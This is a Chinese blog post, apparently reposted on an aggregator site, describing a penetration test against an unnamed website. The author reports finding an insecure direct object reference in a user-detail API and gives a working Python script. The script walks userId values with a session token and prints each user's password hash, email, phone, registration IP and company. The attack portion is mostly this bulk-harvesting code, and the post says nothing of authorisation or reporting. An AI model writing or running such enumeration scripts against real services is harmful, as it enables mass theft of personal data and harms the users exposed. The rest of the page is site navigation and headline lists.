渗透实战-api越权遍历批量获取个人信息 - 代码天地

渗透实战-api越权遍历批量获取个人信息

编程语言 2023-09-06 23:04:54 阅读次数: 0

对一个网站进行渗透测试，登录后，点击“编辑信息”

查看请求数据，其中一条请求数据如下，系统通过userId值回显账号相关信息，其中涉及账号、hash密码、邮箱，手机号等一些敏感信息

尝试将userId值修改为1，成功回显他人账号信息

说明系统是存在api遍历的问题，编写python脚本遍历userId值，批量获取个人信息

脚本如下

import requests
from colorama import init,Fore
init(autoreset=True)

header = {
'Cookie':'xxx',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Token':'625390f4-1103-4923-84b6-92ef86e7141c',
'Referer':'https://xx/userCenter/manCore/manMassage',
'Sec-Fetch-Dest':'empty',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'Te':'trailers',
'Connection':'close',
}

for i in range(1,100):
    url = "https://xx/api/personal/detail?userId=%s" %i
    try:
        res = requests.get(url=url, headers=header)
        text = res.json()
        company = text.get("data").get("company")
        ip = text.get("data").get("createIP")
        name = text.get("data").get("userName")
        password = text.get("data").get("password")
        emil = text.get("data").get("emil")
        phone = text.get("data").get("phone")
        print(Fore.GREEN+"company:%s, 注册ip:%s, 账号:%s, 密码:%s, 邮箱:%s, 手机号:%s" %(company, ip, name, password, emil, phone))
    except:
        pass

猜你喜欢

转载自blog.csdn.net/qq_44159028/article/details/130845147

渗透实战-api越权遍历批量获取个人信息

调用ins api获取个人信息

【渗透实战】绕过某企业waf_成功脱出3000+企业员工个人信息

Xposed获取微信个人信息

根据域名查注册人信息,查询邮箱下注册过哪些IP,社工渗透,获取个人信息

授权登录获取用户个人信息实战【过程截图保存】

tencent API(三) 接收,解析个人信息

个人信息

个人信息显示

个人信息界面

个人信息-python

Android 微信授权登录、获取个人信息

爬虫基础-登陆github获取个人信息

微信获取个人信息并进行整理

BrowserCookie 模拟登录B站，获取个人信息

微信授权获取个人信息头像姓名地区

微信PC端获取个人信息

个人信息打印并展示

个人信息显示界面

注册+登录+个人信息

个人信息打码

个人信息维度汇总

Django编辑个人信息

Django展示个人信息

Django维护个人信息

git设置个人信息

修改个人信息

个人信息保护政策

831 隐藏个人信息

个人信息对接口

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)